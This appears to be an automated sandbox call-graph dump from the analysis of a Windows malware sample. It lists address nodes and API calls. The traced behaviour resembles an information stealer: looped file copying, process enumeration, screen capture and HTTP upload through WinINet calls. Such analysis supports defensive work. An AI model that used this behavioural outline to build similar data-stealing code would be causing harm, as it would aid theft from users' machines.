45068->45081 45069 84c7b4 45130 854940 45069->45130 45070->45069 45072 84c764 45070->45072 45071 836503 3 API calls 45071->45081 45161 830a59 6 API calls 45072->45161 45075 84c76e 45080 854940 19 API calls 45075->45080 45087 84c78d 45075->45087 45076 84c7f6 45079 84c814 45076->45079 45164 84874c 45076->45164 45077 836566 LeaveCriticalSection 45077->45081 45093 84c8a6 45079->45093 45094 84c85d 45079->45094 45118 84c977 45079->45118 45083 84c786 45080->45083 45081->45070 45081->45071 45081->45077 45084 84c793 45081->45084 45085 8306db 5 API calls 45083->45085 45162 8321f9 8 API calls 45084->45162 45085->45087 45087->45076 45163 84c5fb 13 API calls 45087->45163 45088 84c99a 45090 84c9b1 45088->45090 45091 83ea32 14 API calls 45088->45091 45089 84c7a9 45126 836629 LeaveCriticalSection 45089->45126 45091->45090 45179 83d8c0 8 API calls 45093->45179 45176 83d8c0 8 API calls 45094->45176 45118->45088 45188 830a59 6 API calls 45118->45188 45126->44471 45127->44473 45128->45065 45129->45065 45131 854964 45130->45131 45132 830614 6 API calls 45131->45132 45139 85497b 45132->45139 45133 854989 45133->45087 45134 854af0 45136 8306db 5 API calls 45134->45136 45137 854a73 45143 8306db 5 API calls 45137->45143 45146 854a24 45137->45146 45138 854acd 45142 854289 8 API calls 45138->45142 45139->45133 45139->45137 45141 854289 8 API calls 45139->45141 45144 854a0d 45139->45144 45139->45146 45196 8543c9 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45139->45196 45141->45139 45142->45134 45143->45146 45197 830a7c 8 API calls 2 library calls 45144->45197 45146->45134 45146->45138 45192 854289 45146->45192 45161->45075 45162->45089 45163->45076 45165 84875d 45164->45165 45169 848762 45164->45169 45166 836587 3 API calls 45165->45166 45166->45169 45167 848798 45169->45167 45175 848894 45169->45175 45203 84baa9 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection RtlFreeHeap GetLastError 45169->45203 45175->45079 45188->45088 45193 85429c 45192->45193 45195 8542ea 45193->45195 45202 832264 8 API calls 45193->45202 45195->45138 45196->45139 45197->45146 45202->45195 45203->45169 45205->44478 45212 83ed29 45206->45212 45213 83ed31 45206->45213 45207 83ed50 45207->45212 45245 8321f9 8 API calls 45207->45245 45208 83ede3 45226 83d4af 45208->45226 45209 83edea 45235 83fa22 45209->45235 45212->44493 45213->45207 45213->45208 45213->45209 45213->45212 45216 83eea1 45244 830af7 8 API calls 45216->45244 45218 83ede8 45243 8321f9 8 API calls 45218->45243 45219->44493 45220->44493 45221->44493 45222->44487 45224->44483 45225->44475 45227 83d4d9 45226->45227 45234 83d4d1 _strlen 45226->45234 45246 83d48f EnterCriticalSection GetCurrentThreadId LeaveCriticalSection RtlFreeHeap GetLastError 45227->45246 45229 83d4e3 45230 83d51a 45229->45230 45231 83d53f _strlen 45229->45231 45229->45234 45247 830a7c 8 API calls 2 library calls 45230->45247 45248 83d212 6 API calls 2 library calls 45231->45248 45234->45218 45249 836679 EnterCriticalSection GetCurrentThreadId 45235->45249 45237 8435db 45238 841a0d 45251 8366c2 LeaveCriticalSection 45238->45251 45242 83fa72 45242->45237 45242->45238 45250 83c3b8 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection RtlFreeHeap GetLastError 45242->45250 45243->45216 45244->45207 45245->45212 45246->45229 45247->45234 45248->45234 45249->45242 45250->45242 45252->44500 45253->44502 45254->44497 45255->44507 45256->44511 45258 836503 3 API calls 45257->45258 45261 837755 45258->45261 45259 837771 45288 83826d 13 API calls 45259->45288 45261->45259 45287 8384f9 13 API calls 45261->45287 45262 837778 45264 836566 LeaveCriticalSection 45262->45264 45265 83777f 45264->45265 45266 8377e1 45265->45266 45267 83082c 6 API calls 45265->45267 45279 83780f 45266->45279 45292 8351fb 13 API calls 45266->45292 45269 83778b 45267->45269 45289 8308c1 EnterCriticalSection GetCurrentThreadId 45269->45289 45270 8377ed 45280 8306db 5 API calls 45279->45280 45282->44518 45283->44521 45284->44532 45287->45261 45288->45262 45292->45270 45294 82bb7c _Yarn 45293->45294 45295 82bba3 RegOpenKeyExA 45294->45295 45299 82bbf7 45294->45299 45296 82bbd1 RegGetValueA 45295->45296 45295->45299 45296->45299 45297 82df41 collate 18 API calls 45298 82bc23 45297->45298 45300 82df41 collate 18 API calls 45298->45300 45299->45297 45301 82bc2b 45300->45301 45301->43772 45302->43768 45303->43777 45304->43762 45305 82c44a 45306 82c454 45305->45306 45311 82c495 45306->45311 45355 86db91 EnterCriticalSection LeaveCriticalSection 45306->45355 45307 82c4d8 InternetOpenA InternetConnectA 45309 82c538 45307->45309 45315 82c542 45307->45315 45356 86db91 EnterCriticalSection LeaveCriticalSection 45309->45356 45311->45307 45313 82c5f1 HttpOpenRequestA 45314 82c650 45313->45314 45320 82c65b 45313->45320 45358 86db91 EnterCriticalSection LeaveCriticalSection 45314->45358 45317 82c5aa 45315->45317 45357 86db91 EnterCriticalSection LeaveCriticalSection 45315->45357 45317->45313 45318 82e052 19 API calls 45319 82c6bc 45318->45319 45339 82c813 45319->45339 45320->45318 45322 82c6c1 45323 82e052 19 API calls 45322->45323 45324 82c6ed 45323->45324 45327 82c721 45324->45327 45359 86db91 EnterCriticalSection LeaveCriticalSection 45324->45359 45326 82e052 19 API calls 45328 82c782 45326->45328 45327->45326 45343 82c8b8 45328->45343 45330 82c787 45331 82e052 19 API calls 45330->45331 45332 82c7b1 45331->45332 45347 82c2ca 45332->45347 45335 82df41 collate 18 API calls 45336 82c7fc 45335->45336 45337 82df41 collate 18 API calls 45336->45337 45338 82c804 45337->45338 45340 82c875 45339->45340 45342 82c881 45339->45342 45360 86db91 EnterCriticalSection LeaveCriticalSection 45340->45360 45342->45322 45344 82c905 45343->45344 45345 82c8f9 45343->45345 45344->45330 45361 86db91 EnterCriticalSection LeaveCriticalSection 45345->45361 45348 82c2d4 45347->45348 45362 82c3be 45348->45362 45350 82c2f6 45351 82e052 19 API calls 45350->45351 45352 82c322 HttpSendRequestExA InternetWriteFile InternetWriteFile InternetWriteFile HttpEndRequestA 45351->45352 45353 82df41 collate 18 API calls 45352->45353 45354 82c3ac InternetCloseHandle InternetCloseHandle InternetCloseHandle 45353->45354 45354->45335 45355->45311 45356->45315 45357->45317 45358->45320 45359->45327 45360->45342 45361->45344 45363 82c411 45362->45363 45365 82c41d 45362->45365 45366 86db91 EnterCriticalSection LeaveCriticalSection 45363->45366 45365->45350 45366->45365 45367 82674b 45368 826755 45367->45368 45372 82679a 45368->45372 45392 86db91 EnterCriticalSection LeaveCriticalSection 45368->45392 45370 82e8c7 19 API calls 45371 8267f7 45370->45371 45373 813174 35 API calls 45371->45373 45372->45370 45375 826821 45373->45375 45374 8269ef 45376 82df41 collate 18 API calls 45374->45376 45375->45374 45378 812a7c 35 API calls 45375->45378 45379 8269ac 45375->45379 45383 82e143 18 API calls 45375->45383 45384 82df41 collate 18 API calls 45375->45384 45385 82e0ab messages 19 API calls 45375->45385 45386 812ebb 45375->45386 45393 82e5d4 45375->45393 45377 826a52 45376->45377 45378->45375 45381 82df41 collate 18 API calls 45379->45381 45381->45374 45383->45375 45384->45375 45385->45375 45387 812b95 2 API calls 45386->45387 45388 812eca 45387->45388 45389 812ece 45388->45389 45390 812839 23 API calls 45388->45390 45389->45375 45391 8116cb 45390->45391 45391->45375 45392->45372 45394 82e5e3 45393->45394 45397 82e603 45394->45397 45396 82e5f7 45396->45375 45398 82e60d 45397->45398 45399 82e643 ___std_fs_convert_wide_to_narrow 45398->45399 45400 82e68b 45398->45400 45402 82e67a 45398->45402 45399->45402 45403 82e655 45399->45403 45405 8114ec 22 API calls Concurrency::cancel_current_task 45400->45405 45402->45396 45404 82e668 ___std_fs_convert_wide_to_narrow 45403->45404 45404->45402 45405->45402 45406 883243 GetStartupInfoW 45407 883260 45406->45407 45408 8832f4 45406->45408 45407->45408 45412 888e98 45407->45412 45410 883288 45410->45408 45411 8832b8 GetFileType 45410->45411 45411->45410 45413 888ea4 CallCatchBlock 45412->45413 45414 888ead 45413->45414 45415 888ece 45413->45415 45427 873529 18 API calls _Deallocate 45414->45427 45421 87703f EnterCriticalSection 45415->45421 45418 888ebc 45418->45410 45419 888eda 45419->45418 45422 888de8 45419->45422 45421->45419 45423 8800c6 _unexpected 3 API calls 45422->45423 45425 888dfa 45423->45425 45424 880123 _free 2 API calls 45426 888e5c 45424->45426 45425->45424 45426->45419 45427->45418 45428 8848a6 45429 8848b3 45428->45429 45430 8848cb 45428->45430 45451 873529 18 API calls _Deallocate 45429->45451 45432 8848c3 45430->45432 45433 88117f __fread_nolock 18 API calls 45430->45433 45434 884942 45433->45434 45444 8843e2 45434->45444 45436 884949 45436->45432 45437 88117f __fread_nolock 18 API calls 45436->45437 45438 884976 45437->45438 45438->45432 45439 88117f __fread_nolock 18 API calls 45438->45439 45440 884984 45439->45440 45440->45432 45441 88117f __fread_nolock 18 API calls 45440->45441 45442 884994 45441->45442 45443 88117f __fread_nolock 18 API calls 45442->45443 45443->45432 45445 8843ee CallCatchBlock 45444->45445 45446 88444d 45445->45446 45447 884462 45445->45447 45450 8843f6 45445->45450 45452 873529 18 API calls _Deallocate 45446->45452 45449 8844f6 __fread_nolock 32 API calls 45447->45449 45447->45450 45449->45450 45450->45436 45451->45432 45452->45450 45453 813292 45454 8132a4 45453->45454 45460 856087 CreateDirectoryW 45454->45460 45457 8132b0 45458 81290a 24 API calls 45459 8132c0 45458->45459 45461 8560a6 GetLastError 45460->45461 45462 8132ac 45460->45462 45461->45462 45463 8560b8 45461->45463 45462->45457 45462->45458 45464 8561b5 21 API calls 45463->45464 45464->45462 45465 82bcd1 45467 82bcdb 45465->45467 45466 82bdb7 45467->45466 45479 82bd73 45467->45479 45480 819294 45467->45480 45593 81c9ec 45467->45593 45617 82b7c3 45467->45617 45653 82aa32 45467->45653 45666 81d88b 45467->45666 45712 81ddc0 45467->45712 45762 81e23e 45467->45762 45816 81e85f 45467->45816 45866 81f1a2 45467->45866 45914 81f68f 45467->45914 45479->45467 45964 81d397 73 API calls collate 45479->45964 45481 81929e 45480->45481 45483 8192ec 45481->45483 45965 86db91 EnterCriticalSection LeaveCriticalSection 45481->45965 45486 819376 45483->45486 45966 86db91 EnterCriticalSection LeaveCriticalSection 45483->45966 45485 82bb72 20 API calls 45490 8193db 45485->45490 45486->45485 45487 81a1c1 45488 82df41 collate 18 API calls 45487->45488 45489 81a1cc 45488->45489 45489->45467 45490->45487 45491 82e8c7 19 API calls 45490->45491 45492 81943a 45491->45492 45493 82fa3b 19 API calls 45492->45493 45494 81944f 45493->45494 45495 82e917 19 API calls 45494->45495 45496 819469 45495->45496 45497 82fa3b 19 API calls 45496->45497 45498 81947e 45497->45498 45499 82df41 collate 18 API calls 45498->45499 45500 819489 45499->45500 45501 82df41 collate 18 API calls 45500->45501 45502 819494 45501->45502 45503 82df41 collate 18 API calls 45502->45503 45504 81949f 45503->45504 45505 82df41 collate 18 API calls 45504->45505 45506 8194aa 45505->45506 45507 82df41 collate 18 API calls 45506->45507 45508 8194b9 45507->45508 45509 82e8c7 19 API calls 45508->45509 45510 8194f6 45509->45510 45511 82fa3b 19 API calls 45510->45511 45512 81950d 45511->45512 45513 82e917 19 API calls 45512->45513 45514 819524 45513->45514 45515 82fa3b 19 API calls 45514->45515 45516 819539 45515->45516 45517 82df41 collate 18 API calls 45516->45517 45518 81954a 45517->45518 45519 82df41 collate 18 API calls 45518->45519 45520 819552 45519->45520 45521 82df41 collate 18 API calls 45520->45521 45522 81955d 45521->45522 45523 82df41 collate 18 API calls 45522->45523 45524 819568 45523->45524 45525 82df41 collate 18 API calls 45524->45525 45560 819573 45525->45560 45526 812a7c 35 API calls 45526->45560 45527 8198f2 45533 819957 45527->45533 45981 86db91 EnterCriticalSection LeaveCriticalSection 45527->45981 45529 812ebb 25 API calls 45529->45560 45530 82e0ab messages 19 API calls 45531 8199b1 45530->45531 45532 82e917 19 API calls 45531->45532 45534 8199c8 45532->45534 45533->45530 45535 82df41 collate 18 API calls 45534->45535 45536 819a0b 45535->45536 45537 82df41 collate 18 API calls 45536->45537 45592 819a13 45537->45592 45539 812a7c 35 API calls 45539->45592 45540 819e74 45541 82d9c4 19 API calls 45540->45541 45542 819eb2 45541->45542 45549 819eeb 45542->45549 45990 86db91 EnterCriticalSection LeaveCriticalSection 45542->45990 45544 812ebb 25 API calls 45544->45592 45546 82e0ab messages 19 API calls 45547 819f45 45546->45547 45548 82e917 19 API calls 45547->45548 45552 819f5f 45548->45552 45549->45546 45550 86db91 EnterCriticalSection LeaveCriticalSection 45550->45592 45551 82e5d4 24 API calls 45551->45560 45554 86db91 EnterCriticalSection LeaveCriticalSection 45554->45560 45556 82e5d4 24 API calls 45556->45592 45557 813225 37 API calls 45557->45592 45559 8183df 40 API calls 45559->45560 45560->45526 45560->45527 45560->45529 45560->45551 45560->45554 45560->45559 45561 82df41 18 API calls collate 45560->45561 45967 813225 45560->45967 45974 813139 45560->45974 45561->45560 45565 813139 33 API calls 45565->45592 45572 82e917 19 API calls 45572->45592 45578 82d9e5 19 API calls 45578->45592 45586 82df41 18 API calls collate 45586->45592 45591 8183df 40 API calls 45591->45592 45592->45539 45592->45540 45592->45544 45592->45550 45592->45556 45592->45557 45592->45565 45592->45572 45592->45578 45592->45586 45592->45591 45982 82d8d6 45592->45982 45989 81a1e1 EnterCriticalSection LeaveCriticalSection 45592->45989 45594 81c9f6 45593->45594 45596 81ca48 45594->45596 46033 86db91 EnterCriticalSection LeaveCriticalSection 45594->46033 45597 82e0ab messages 19 API calls 45596->45597 45598 81cad1 45597->45598 46023 826592 45598->46023 45600 81d368 45602 82df41 collate 18 API calls 45600->45602 45601 82e0ab messages 19 API calls 45607 81cadc 45601->45607 45603 81d388 45602->45603 45603->45467 45604 82d8d6 19 API calls 45604->45607 45605 82e917 19 API calls 45605->45607 45606 82e143 18 API calls 45606->45607 45607->45600 45607->45601 45607->45604 45607->45605 45607->45606 45608 813174 35 API calls 45607->45608 45609 812a7c 35 API calls 45607->45609 45610 82e8c7 19 API calls 45607->45610 45611 86db91 EnterCriticalSection LeaveCriticalSection 45607->45611 45612 812ebb 25 API calls 45607->45612 45613 82e5d4 24 API calls 45607->45613 45614 82fa3b 19 API calls 45607->45614 45615 8183df 40 API calls 45607->45615 45616 82df41 18 API calls collate 45607->45616 45608->45607 45609->45607 45610->45607 45611->45607 45612->45607 45613->45607 45614->45607 45615->45607 45616->45607 45619 82b7cd 45617->45619 45618 82b9c1 45618->45467 45619->45618 45620 82e8c7 19 API calls 45619->45620 45621 82b827 45620->45621 45622 82fa3b 19 API calls 45621->45622 45623 82b83c 45622->45623 45624 82e917 19 API calls 45623->45624 45625 82b856 45624->45625 45626 82fa3b 19 API calls 45625->45626 45627 82b868 45626->45627 45628 82df41 collate 18 API calls 45627->45628 45629 82b873 45628->45629 45630 82df41 collate 18 API calls 45629->45630 45631 82b87e 45630->45631 45632 82df41 collate 18 API calls 45631->45632 45633 82b889 45632->45633 45634 82df41 collate 18 API calls 45633->45634 45635 82b894 45634->45635 45636 82df41 collate 18 API calls 45635->45636 45637 82b8a3 KiUserCallbackDispatcher GetSystemMetrics GetDC 45636->45637 45638 82b8cf SelectObject 45637->45638 45640 82b904 45638->45640 46034 814619 45640->46034 45642 82b931 EnterCriticalSection LeaveCriticalSection 46041 814bcb GetObjectA 45642->46041 45644 82b957 45645 82b96c DeleteDC DeleteObject ReleaseDC 45644->45645 46043 82b9d6 45645->46043 45647 82b997 45648 8183df 40 API calls 45647->45648 45649 82b9ae 45648->45649 46047 8146e3 10 API calls 45649->46047 45651 82b9b9 45652 82df41 collate 18 API calls 45651->45652 45652->45618 45654 82aa3c 45653->45654 46050 82a518 45654->46050 45656 82aed2 45656->45467 45657 82aeb0 FreeLibrary 45657->45656 45659 82d9c4 19 API calls 45665 82aa47 45659->45665 45660 82df41 18 API calls collate 45660->45665 45661 82a933 26 API calls 45661->45665 45662 86db91 EnterCriticalSection LeaveCriticalSection 45662->45665 45663 82e917 19 API calls 45663->45665 45664 82d9e5 19 API calls 45664->45665 45665->45656 45665->45657 45665->45659 45665->45660 45665->45661 45665->45662 45665->45663 45665->45664 45667 81d895 45666->45667 45668 82e8c7 19 API calls 45667->45668 45669 81d8e2 45668->45669 45670 82fa3b 19 API calls 45669->45670 45671 81d8f4 45670->45671 45672 82e917 19 API calls 45671->45672 45673 81d910 45672->45673 45674 82fa3b 19 API calls 45673->45674 45675 81d922 45674->45675 45676 82df41 collate 18 API calls 45675->45676 45677 81d933 45676->45677 45678 82df41 collate 18 API calls 45677->45678 45679 81d93b 45678->45679 45680 82df41 collate 18 API calls 45679->45680 45681 81d946 45680->45681 45682 82df41 collate 18 API calls 45681->45682 45683 81d951 45682->45683 45684 82df41 collate 18 API calls 45683->45684 45685 81d960 45684->45685 45687 81d9b0 45685->45687 46089 86db91 EnterCriticalSection LeaveCriticalSection 45685->46089 45688 82e917 19 API calls 45687->45688 45689 81da2d 45688->45689 45690 82df41 collate 18 API calls 45689->45690 45691 81da3a 45690->45691 45692 813174 35 API calls 45691->45692 45699 81da98 45692->45699 45693 82df41 collate 18 API calls 45694 81dd1c 45693->45694 45695 82df41 collate 18 API calls 45694->45695 45696 81dd27 45695->45696 45697 82df41 collate 18 API calls 45696->45697 45698 81dd2f 45697->45698 45698->45467 45701 81dc81 45699->45701 45703 81dcbd 45699->45703 45710 81db35 45699->45710 45700 813225 37 API calls 45700->45710 45702 813225 37 API calls 45701->45702 45702->45703 45703->45693 45704 82e5d4 24 API calls 45705 81db7b CopyFileA 45704->45705 45706 82df41 collate 18 API calls 45705->45706 45706->45710 45707 812ebb 25 API calls 45707->45710 45708 82e5d4 24 API calls 45708->45710 45709 8183df 40 API calls 45709->45710 45710->45699 45710->45700 45710->45704 45710->45707 45710->45708 45710->45709 45711 82df41 18 API calls collate 45710->45711 45711->45710 45713 81ddca 45712->45713 45714 82e8c7 19 API calls 45713->45714 45715 81de13 45714->45715 45716 82fa3b 19 API calls 45715->45716 45717 81de28 45716->45717 45718 82e917 19 API calls 45717->45718 45719 81de42 45718->45719 45720 82fa3b 19 API calls 45719->45720 45721 81de54 45720->45721 45722 82df41 collate 18 API calls 45721->45722 45723 81de5f 45722->45723 45724 82df41 collate 18 API calls 45723->45724 45725 81de6a 45724->45725 45726 82df41 collate 18 API calls 45725->45726 45727 81de75 45726->45727 45728 82df41 collate 18 API calls 45727->45728 45729 81de80 45728->45729 45730 82df41 collate 18 API calls 45729->45730 45731 81de8c 45730->45731 45734 81dec3 45731->45734 46090 86db91 EnterCriticalSection LeaveCriticalSection 45731->46090 45735 81df39 45734->45735 46091 86db91 EnterCriticalSection LeaveCriticalSection 45734->46091 45738 81dfd4 45735->45738 46092 86db91 EnterCriticalSection LeaveCriticalSection 45735->46092 45737 82bb72 20 API calls 45739 81e039 45737->45739 45738->45737 45740 82e917 19 API calls 45739->45740 45741 81e04f 45740->45741 45742 82df41 collate 18 API calls 45741->45742 45743 81e05d 45742->45743 45744 813174 35 API calls 45743->45744 45745 81e088 45744->45745 45746 81e0a4 45745->45746 45747 81e1c9 45745->45747 45748 813225 37 API calls 45746->45748 45749 813225 37 API calls 45747->45749 45750 81e0c8 45748->45750 45751 81e1ee 45749->45751 45752 81e0d7 CopyFileA 45750->45752 45753 82df41 collate 18 API calls 45751->45753 45752->45747 45754 81e104 45752->45754 45755 81e227 45753->45755 45761 81e151 45754->45761 46093 86db91 EnterCriticalSection LeaveCriticalSection 45754->46093 45757 82df41 collate 18 API calls 45755->45757 45758 81e22f 45757->45758 45758->45467 45759 8183df 40 API calls 45760 81e1a6 45759->45760 45760->45747 45761->45759 45763 81e248 45762->45763 45764 82e8c7 19 API calls 45763->45764 45765 81e295 45764->45765 45766 82fa3b 19 API calls 45765->45766 45767 81e2a7 45766->45767 45768 82e917 19 API calls 45767->45768 45769 81e2c3 45768->45769 45770 82fa3b 19 API calls 45769->45770 45771 81e2d5 45770->45771 45772 82df41 collate 18 API calls 45771->45772 45773 81e2e6 45772->45773 45774 82df41 collate 18 API calls 45773->45774 45775 81e2ee 45774->45775 45776 82df41 collate 18 API calls 45775->45776 45777 81e2f9 45776->45777 45778 82df41 collate 18 API calls 45777->45778 45779 81e304 45778->45779 45780 82df41 collate 18 API calls 45779->45780 45781 81e313 45780->45781 45783 81e349 45781->45783 46094 86db91 EnterCriticalSection LeaveCriticalSection 45781->46094 45784 82e917 19 API calls 45783->45784 45785 81e3d2 45784->45785 45786 82df41 collate 18 API calls 45785->45786 45787 81e3e2 45786->45787 45789 81e408 45787->45789 46095 86db91 EnterCriticalSection LeaveCriticalSection 45787->46095 45791 81e49f 45789->45791 46096 86db91 EnterCriticalSection LeaveCriticalSection 45789->46096 45792 813174 35 API calls 45791->45792 45802 81e528 45792->45802 45793 81e7b5 45794 82df41 collate 18 API calls 45793->45794 45795 81e832 45794->45795 45796 82df41 collate 18 API calls 45795->45796 45797 81e83d 45796->45797 45798 82df41 collate 18 API calls 45797->45798 45799 81e848 45798->45799 45800 82df41 collate 18 API calls 45799->45800 45801 81e850 45800->45801 45801->45467 45802->45793 45803 82e5d4 24 API calls 45802->45803 45804 81e773 45802->45804 45806 82df41 collate 18 API calls 45802->45806 45807 812ebb 25 API calls 45802->45807 45814 81e61f 45802->45814 45803->45802 45805 813225 37 API calls 45804->45805 45805->45793 45806->45802 45807->45802 45808 813225 37 API calls 45808->45814 45809 82e5d4 24 API calls 45810 81e665 CopyFileA 45809->45810 45811 82df41 collate 18 API calls 45810->45811 45811->45814 45812 82e5d4 24 API calls 45812->45814 45813 8183df 40 API calls 45813->45814 45814->45802 45814->45808 45814->45809 45814->45812 45814->45813 45815 82df41 18 API calls collate 45814->45815 45815->45814 45817 81e869 45816->45817 45818 82e8c7 19 API calls 45817->45818 45819 81e8b2 45818->45819 45820 82fa3b 19 API calls 45819->45820 45821 81e8c7 45820->45821 45822 82e917 19 API calls 45821->45822 45823 81e8e1 45822->45823 45824 82fa3b 19 API calls 45823->45824 45825 81e8f3 45824->45825 45826 82df41 collate 18 API calls 45825->45826 45827 81e8fe 45826->45827 45828 82df41 collate 18 API calls 45827->45828 45829 81e909 45828->45829 45830 82df41 collate 18 API calls 45829->45830 45831 81e914 45830->45831 45832 82df41 collate 18 API calls 45831->45832 45833 81e91f 45832->45833 45834 82df41 collate 18 API calls 45833->45834 45835 81e92b 45834->45835 45838 81e962 45835->45838 46097 86db91 EnterCriticalSection LeaveCriticalSection 45835->46097 45839 81e9d8 45838->45839 46098 86db91 EnterCriticalSection LeaveCriticalSection 45838->46098 45843 81ea6b 45839->45843 46099 86db91 EnterCriticalSection LeaveCriticalSection 45839->46099 45841 82bb72 20 API calls 45842 81ead0 45841->45842 45844 82e917 19 API calls 45842->45844 45843->45841 45845 81eae3 45844->45845 45846 82df41 collate 18 API calls 45845->45846 45847 81eaf1 45846->45847 45848 813174 35 API calls 45847->45848 45849 81eb19 45848->45849 45850 81eb35 45849->45850 45851 81ec4a 45849->45851 45852 813225 37 API calls 45850->45852 45853 813225 37 API calls 45851->45853 45854 81eb59 45852->45854 45855 81ec6f 45853->45855 45856 81eb68 CopyFileA 45854->45856 45858 82df41 collate 18 API calls 45855->45858 45856->45851 45857 81eb8f 45856->45857 45865 81ebd2 45857->45865 46100 86db91 EnterCriticalSection LeaveCriticalSection 45857->46100 45859 81ec9f 45858->45859 45860 82df41 collate 18 API calls 45859->45860 45862 81eca7 45860->45862 45862->45467 45863 8183df 40 API calls 45864 81ec27 45863->45864 45864->45851 45865->45863 45867 81f1ac 45866->45867 45868 82e8c7 19 API calls 45867->45868 45869 81f1f9 45868->45869 45870 82fa3b 19 API calls 45869->45870 45871 81f20b 45870->45871 45872 82e917 19 API calls 45871->45872 45873 81f227 45872->45873 45874 82fa3b 19 API calls 45873->45874 45875 81f239 45874->45875 45876 82df41 collate 18 API calls 45875->45876 45877 81f24a 45876->45877 45878 82df41 collate 18 API calls 45877->45878 45879 81f252 45878->45879 45880 82df41 collate 18 API calls 45879->45880 45881 81f25d 45880->45881 45882 82df41 collate 18 API calls 45881->45882 45883 81f268 45882->45883 45884 82df41 collate 18 API calls 45883->45884 45885 81f277 45884->45885 45887 81f2af 45885->45887 46101 86db91 EnterCriticalSection LeaveCriticalSection 45885->46101 45888 82e917 19 API calls 45887->45888 45889 81f32c 45888->45889 45890 82df41 collate 18 API calls 45889->45890 45891 81f339 45890->45891 45893 81f365 45891->45893 46102 86db91 EnterCriticalSection LeaveCriticalSection 45891->46102 45894 813174 35 API calls 45893->45894 45901 81f3f5 45894->45901 45895 82df41 collate 18 API calls 45896 81f66d 45895->45896 45897 82df41 collate 18 API calls 45896->45897 45898 81f678 45897->45898 45899 82df41 collate 18 API calls 45898->45899 45900 81f680 45899->45900 45900->45467 45903 81f5d5 45901->45903 45905 81f60e 45901->45905 45912 81f489 45901->45912 45902 813225 37 API calls 45902->45912 45904 813225 37 API calls 45903->45904 45904->45905 45905->45895 45906 82e5d4 24 API calls 45907 81f4cf CopyFileA 45906->45907 45908 82df41 collate 18 API calls 45907->45908 45908->45912 45909 812ebb 25 API calls 45909->45912 45910 82e5d4 24 API calls 45910->45912 45911 8183df 40 API calls 45911->45912 45912->45901 45912->45902 45912->45906 45912->45909 45912->45910 45912->45911 45913 82df41 18 API calls collate 45912->45913 45913->45912 45915 81f699 45914->45915 45916 82e8c7 19 API calls 45915->45916 45917 81f6e2 45916->45917 45918 82fa3b 19 API calls 45917->45918 45919 81f6f7 45918->45919 45920 82e917 19 API calls 45919->45920 45921 81f711 45920->45921 45922 82fa3b 19 API calls 45921->45922 45923 81f723 45922->45923 45924 82df41 collate 18 API calls 45923->45924 45925 81f72e 45924->45925 45926 82df41 collate 18 API calls 45925->45926 45927 81f739 45926->45927 45928 82df41 collate 18 API calls 45927->45928 45929 81f744 45928->45929 45930 82df41 collate 18 API calls 45929->45930 45931 81f74f 45930->45931 45932 82df41 collate 18 API calls 45931->45932 45933 81f75b 45932->45933 45936 81f792 45933->45936 46103 86db91 EnterCriticalSection LeaveCriticalSection 45933->46103 45937 81f808 45936->45937 46104 86db91 EnterCriticalSection LeaveCriticalSection 45936->46104 45941 81f8a9 45937->45941 46105 86db91 EnterCriticalSection LeaveCriticalSection 45937->46105 45939 82bb72 20 API calls 45940 81f90e 45939->45940 45942 82e917 19 API calls 45940->45942 45941->45939 45943 81f924 45942->45943 45944 82df41 collate 18 API calls 45943->45944 45945 81f932 45944->45945 45946 813174 35 API calls 45945->45946 45947 81f95d 45946->45947 45948 81fa94 45947->45948 45949 81f979 45947->45949 45950 813225 37 API calls 45948->45950 45951 813225 37 API calls 45949->45951 45952 81fab9 45950->45952 45953 81f99d 45951->45953 45955 82df41 collate 18 API calls 45952->45955 45954 81f9ac CopyFileA 45953->45954 45954->45948 45956 81f9d9 45954->45956 45957 81faf2 45955->45957 45963 81fa1c 45956->45963 46106 86db91 EnterCriticalSection LeaveCriticalSection 45956->46106 45958 82df41 collate 18 API calls 45957->45958 45960 81fafa 45958->45960 45960->45467 45961 8183df 40 API calls 45962 81fa71 45961->45962 45962->45948 45963->45961 45964->45479 45965->45483 45966->45486 45968 813237 45967->45968 45969 856531 18 API calls 45968->45969 45970 81323f 45969->45970 45971 813243 45970->45971 45972 81290a 24 API calls 45970->45972 45971->45560 45973 813253 45972->45973 45975 81314d 45974->45975 45992 855f2f 45975->45992 45978 813166 45978->45560 45981->45533 45983 82d8f6 45982->45983 45984 82d91b 45982->45984 45986 82e009 collate 19 API calls 45983->45986 46022 82e2ac 19 API calls 45984->46022 45988 82d913 45986->45988 45988->45592 45989->45592 45990->45549 45993 856064 45992->45993 45994 855f68 45992->45994 45996 855d67 ___std_fs_copy_file@12 2 API calls 45993->45996 46019 855d67 CopyFileW 45994->46019 45998 813162 45996->45998 45998->45978 46018 812966 24 API calls Concurrency::cancel_current_task 45998->46018 45999 855f86 CreateFileW 46000 855fc4 CreateFileW 45999->46000 46001 855fa3 GetLastError 45999->46001 46003 855fe1 GetLastError 46000->46003 46012 855ffe 46000->46012 46001->46000 46002 855faf 46001->46002 46005 855d9c ___std_fs_copy_file@12 8 API calls 46002->46005 46004 855fee 46003->46004 46003->46012 46006 855d9c ___std_fs_copy_file@12 8 API calls 46004->46006 46007 855fba 46005->46007 46010 855ff9 46006->46010 46007->45998 46008 856013 46009 855d9c ___std_fs_copy_file@12 8 API calls 46008->46009 46009->46010 46011 855d9c ___std_fs_copy_file@12 8 API calls 46010->46011 46011->46007 46012->46008 46013 856056 46012->46013 46014 855d9c ___std_fs_copy_file@12 8 API calls 46013->46014 46015 85605c 46014->46015 46016 855d9c ___std_fs_copy_file@12 8 API calls 46015->46016 46017 856062 46016->46017 46017->45993 46020 855d81 46019->46020 46021 855d89 GetLastError 46019->46021 46020->45998 46020->45999 46021->46020 46024 82659c 46023->46024 46025 8265cf CreateToolhelp32Snapshot 46024->46025 46026 8266f0 46024->46026 46025->46026 46029 8265f5 collate 46025->46029 46027 82df41 collate 18 API calls 46026->46027 46028 82671a 46027->46028 46028->45607 46030 82df41 collate 18 API calls 46029->46030 46031 8266d7 Process32Next 46029->46031 46032 82df41 collate 18 API calls 46029->46032 46030->46029 46031->46026 46031->46029 46032->46031 46033->45596 46035 814680 46034->46035 46036 81462e 46034->46036 46035->45642 46048 86db91 EnterCriticalSection LeaveCriticalSection 46036->46048 46038 81463a 46038->46035 46039 814644 InitializeCriticalSectionEx 46038->46039 46039->46035 46040 814666 GetLastError 46039->46040 46040->46035 46042 814bec 46041->46042 46042->45644 46044 82ba10 46043->46044 46046 82ba1c 46043->46046 46049 86db91 EnterCriticalSection LeaveCriticalSection 46044->46049 46046->45647 46047->45651 